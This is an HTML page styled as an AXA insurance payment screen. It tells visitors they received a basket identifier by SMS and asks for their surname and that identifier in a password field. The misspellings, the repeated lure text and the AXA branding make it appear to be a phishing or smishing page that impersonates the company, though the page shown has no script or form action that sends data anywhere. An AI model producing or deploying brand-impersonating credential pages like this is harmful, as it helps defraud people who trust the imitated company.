<html>


<style>
    * {
        -webkit-box-sizing: border-box;
        /*! box-sizing:border-box; */
    }

    @media(min-width:1280px) {
        .container {
            width: 1170px
        }
    }

    @media(min-width:1024px) {
        .container {
            width: 1004px
        }

        .col-md-6 {
            width: 50%;
        }

        .col-md-1,
        .col-md-10,
        .col-md-11,
        .col-md-12,
        .col-md-2,
        .col-md-3,
        .col-md-4,
        .col-md-5,
        .col-md-6,
        .col-md-7,
        .col-md-8,
        .col-md-9 {
            float: left;
        }

    }

    @media(min-width:768px) {
        .container {
            width: 748px;
        }

        .container--middle {
            width: 100%;
            margin-top: 1.5rem;
            -webkit-transition: margin-top .2s ease;
            transition: margin-top .2s ease
        }

        .box {
            width: 768px;
            margin-top: 0 !important;
        }

        .login-container .row {
            display: table;
            width: 100%;
        }

        .login-container .login-connect {
            -webkit-box-shadow: 0 0 26px -6px rgba(0, 0, 0, .75);
            box-shadow: 0 0 26px -6px rgba(0, 0, 0, .75);
            padding: 0 25px 25px;
        }

        .login-container .col {
            display: table-cell;
            float: none;
        }

        .connect {
            -webkit-box-shadow: 0 4px 0 0 #d7d7d9;
            box-shadow: 0 4px 0 0 #d7d7d9;
            width: 50%;
        }

        .col-sm-6 {
            width: 50%;
        }

        .col-sm-1,
        .col-sm-10,
        .col-sm-11,
        .col-sm-12,
        .col-sm-2,
        .col-sm-3,
        .col-sm-4,
        .col-sm-5,
        .col-sm-6,
        .col-sm-7,
        .col-sm-8,
        .col-sm-9 {
            float: left;
        }

        .header {
            width: 384px;
        }


    }

    @media(min-width:450px) {
        .connect {
            display: block;
            margin: 0 auto;
        }

        .header {
            margin-bottom: 20px;
        }


    }

    .container {
        margin-right: auto;
        margin-left: auto;
        padding-left: 25px;
        padding-right: 25px;
        font-family: SourceSansPro, Arial, sans-serif;
    }

    .container--middle {
        width: 100% !important;
        padding: 0;
    }

    .box {
        width: 100%;
        margin: auto;
    }

    .row {
        margin: 0;
    }

    ::-moz-placeholder {
        font-size: 15px !important;
    }

    .row:after,
    .row:before {
        content: " ";
        display: table;
    }

    .row:after {
        clear: both;
    }

    .connect {
        -webkit-box-shadow: none;
        box-shadow: none;
        background: #fff;
    }

    .login-connect {
        padding-bottom: 15px;
    }

    .col {
        padding: 25px;
    }

    .col-md-6,
    .col-sm-6 {
        position: relative;
        min-height: 1px;
        padding-left: 25px;
        padding-right: 25px;
    }

    .header {
        margin: 15px auto;
        margin-bottom: 15px;
        text-align: center;
        display: block;
    }

    .logo {
        width: 55px;
        height: 55px;
        background: url(../img/logo-assurance-banque-axa.png) no-repeat 50%;
        background-size: auto auto;
        background-size: 100%;
        margin: 0 10px 0 0;
        display: inline-block;
        vertical-align: middle;
    }

    .form-group::after {
        clear: both;
    }

    .form-group::after,
    .form-group::before {
        content: " ";
        display: table;
    }

    .form-group {
        margin-bottom: 20px;
    }

    .form-group label {
        display: inline-block;
        width: 100%;
        margin-bottom: 10px;
        font-size: 1em;
        font-weight: 500;
        color: #333;
    }

    .form label,
    .header span {
        font-family: SourceSansPro, Arial, sans-serif;
    }

    input::-moz-focus-inner {
        border: 0;
        padding: 0;
    }

    .form-group .form-control::-moz-placeholder {
        color: #999;
        opacity: 1;
    }

    .form-group .form-control {
        font-size: 20px;
    }

    .form-group .form-control--focusid {
        position: relative;
        z-index: 8;
        -webkit-transition: all .3s ease;
        transition: all .3s ease;
    }

    .form-group .form-control {
        display: inline-block;
        width: 100%;
        height: 45px;
        padding: 0 10px;
        margin-right: 5px;
        margin-bottom: 4px;
        font-size: 24px;
        line-height: 45px;
        color: #666;
        background-color: #fff;
        background-image: none;
        border: 1px solid #ccc;
        border-radius: 0;
        -webkit-transition: border-color .15s ease-in-out;
        transition: border-color .15s ease-in-out;
        position: relative;
        z-index: 2;
    }
    input {
    color: inherit;
    font: inherit;
    font-size: inherit;
    line-height: inherit;
    margin: 0;
     margin-right: 0px;
    margin-bottom: 0px;
    }
.form-group .error-msg {
    display: none;
}

.resume-text{
    font-family: SourceSansPro, Arial, sans-serif;
}
.resume{
    padding:8px;
    background-color: #3032c1;
color: #fff;
border-color: #3032c1;
width: 100%;
margin-top: 4%;
margin-bottom: 4%;
}
</style>

<body>
    <div class="container login-container"></div>
    <div class="box login-container">
        <div class="row">
            <div class="col col-md-6 col-sm-6 connect login-connect">
                <div class="header-with-logo">
                    <header class="header">
                        <span class="logo">Cotisation à payer</span>
                    </header>
                    <div class="resume">
                        <span class="resume-text">
                            Vous avez recu un idientifiant panier par sms. Veuilllez le payer ici
                            Vous avez recu un idientifiant panier par sms. Veuilllez le payer ici
                            Vous avez recu un idientifiant panier par sms. Veuilllez le payer ici
                        </span>
                    </div>
                    <div class="form">
                        <div class="form-group">
                            <label>Nom de famille</label>
                            <span>
                                <input type="text" class="form-control form-control--focusid" placeholder="Nom de famille" />
                                <span id="loginError" class="error-msg error"></span>
                                <span id="loginSuccess" class="error-msg success"></span>
                            </span>
                        </div>
                        <div class="form-group">
                            <label>Identifiant panier à 8 caractérers</label>
                            <span>
                                <input type="password" class="form-control form-control--focusid" placeholder="Identifiant panier" />
                                <span id="idPanierError" class="error-msg error"></span>
                                <span id="idPanierSuccess" class="error-msg success"></span>
                            </span>
                        </div>
                        <a class="btn btn--primary-ghost btn--icon" href="https://agence.axa.fr">
                            <i class="btn__icon axa-icons axa-icons-arrow-forward" aria-hidden="true"></i>
                            <span>Valider le panier</span>
                        </a>
                    </div>
                </div>
            </div>

        </div>
    </div>
</body>

</html>